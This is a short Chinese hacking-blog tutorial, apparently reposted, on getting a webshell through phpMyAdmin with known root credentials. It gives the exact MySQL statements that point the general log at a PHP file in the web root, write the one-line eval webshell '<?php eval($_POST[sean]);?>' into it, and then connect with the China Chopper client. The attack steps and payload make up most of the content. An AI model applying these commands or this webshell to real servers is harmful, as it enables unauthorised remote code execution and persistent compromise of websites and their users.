技术笔记

phpmyadmin - getshell

字号+ 作者:黑白之道 来源:转载 2018-07-25 15:16 我要评论( )

前段时间写了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。......

  用已知的root账号密码随便开搞
 
  先看一下服务器信息xx.xx.xx.xx/l.php 主要查看网站路径
 
  网站路径什么的都爆出来了,登录后台
 
  老规矩,查下mysql日志文件路径
 
phpmyadmin - getshell
 
  先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php'; 
 
  修改当前日志文件到网站目录下
 
  set global general_log = "ON";                开启mysql记录日志
  select '<?php eval($_POST[sean]);?>';   插入PHP        一句话木马
  set global general_log = "OFF";              关闭mysql记录日志
 
phpmyadmin - getshell
 
  执行成功
 
phpmyadmin - getshell
 
  接下来上菜刀连接上传好的一句话木马
 
phpmyadmin - getshellphpmyadmin - getshel
 
  蜗蜗侠s’Blog是一只致力专注于黑客技术的小屌丝(蜗蜗侠)创建而成,本站主要以无线安全/内网渗透/渗透测试/代码审计/客户端安全等等一些网络安全技术,以及分享最新的黑客教程渗透测试工具.为网络安全爱好者提供一个能学习的黑客技术网站.

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/689.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~